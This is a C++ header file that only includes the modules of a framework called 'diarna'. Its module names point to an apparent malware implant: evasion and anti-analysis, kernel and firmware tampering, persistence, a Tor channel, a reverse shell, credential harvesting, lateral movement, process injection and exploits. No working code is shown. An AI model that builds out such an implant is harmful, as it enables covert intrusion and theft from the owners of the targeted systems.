#pragma once

#include <diarna/compiler_port.hpp>
#include <diarna/core/config.hpp>
#include <diarna/core/framework.hpp>
#include <diarna/crypto/chacha20.hpp>
#include <diarna/stealth/memory_vault.hpp>
#include <diarna/stealth/anti_analysis.hpp>
#include <diarna/stealth/anti_hook.hpp>
#include <diarna/stealth/polymorph.hpp>
#include <diarna/stealth/hells_gate.hpp>
#include <diarna/stealth/nanomite.hpp>
#include <diarna/stealth/rop_engine.hpp>
#include <diarna/stealth/kernel_ops.hpp>
#include <diarna/stealth/firmware.hpp>
#include <diarna/stealth/forensics.hpp>
#include <diarna/stealth/remap.hpp>
#include <diarna/persistence/manager.hpp>
#include <diarna/comm/tor_client.hpp>
#include <diarna/comm/reverse_shell.hpp>
#include <diarna/comm/protocol.hpp>
#include <diarna/collection/collector.hpp>
#include <diarna/collection/credential_harvester.hpp>
#include <diarna/movement/lateral.hpp>
#include <diarna/exec/injector.hpp>
#include <diarna/exec/executor.hpp>
#include <diarna/exec/stub_injector.hpp>
#include <diarna/exec/exploit.hpp>
#include <diarna/comm/transport.hpp>
#include <diarna/capture/capture.hpp>
